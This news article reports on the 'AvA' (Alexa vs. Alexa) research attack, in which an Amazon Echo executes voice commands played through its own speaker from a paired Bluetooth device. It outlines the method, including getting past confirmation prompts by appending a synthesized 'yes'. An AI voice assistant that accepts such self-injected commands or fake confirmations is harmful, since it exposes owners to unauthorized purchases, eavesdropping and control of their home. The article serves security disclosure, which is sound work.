A group of researchers from the University of Catania and Royal Holloway University in London has discovered a method to make Amazon Echo devices “hack themselves”. By reducing the question to a minimum, the problem arises from the fact that the device recognizes and executes the voice commands reproduced through its own speaker; then just pair a Bluetooth device, and the hacker can fabricate any command he wants – even typing them, thanks to text-to-speech.
In the demonstration video that we include below, you can see different actions and scenarios made possible by the attack. For example:
- The hacker can control other smart devices – shutters, intercoms, thermostats, microwaves and appliances, even doors. Many of these commands require explicit confirmation to run, but it’s an easy limitation for hackers to get around: just add a “yes” to the text-to-speech after a few seconds.
- Call any phone number, even controlled by the hacker.
- Making unauthorized purchases.
- Change calendars or other personal settings.
- Install and launch unsolicited skills – including those capable of intercepting conversations, for example, and all voice commands uttered by the victim.
By its very nature, the attack has important technical limitations: in the very first phase, that of pairing, the attacker must be within a useful range for voice recognition – essentially in the same room, approximating.
Furthermore, the carrier Bluetooth device must constantly remain within the range of action of this radio, so we are talking about ten meters. It can also be argued that if the rightful owner is in the vicinity of the speaker and hears him uttering commands and executing them, it is quite obvious that he will become suspicious, so the attacker must monitor the victim rather closely.
It is not an impossible scenario, of course – let’s think for example of situations of domestic abuse or of espionage/rivalry in the workplace. In any case, all things considered, Amazon assessed the risk level of the vulnerability, which researchers called AvA (Alexa vs. Alexa) as “medium”.
In any case, Amazon has corrected/fixed some of the most serious flaws, in particular the one that allows the MITM (Man-in-the-middle) attack demonstrated in the video around 1:40 minutes.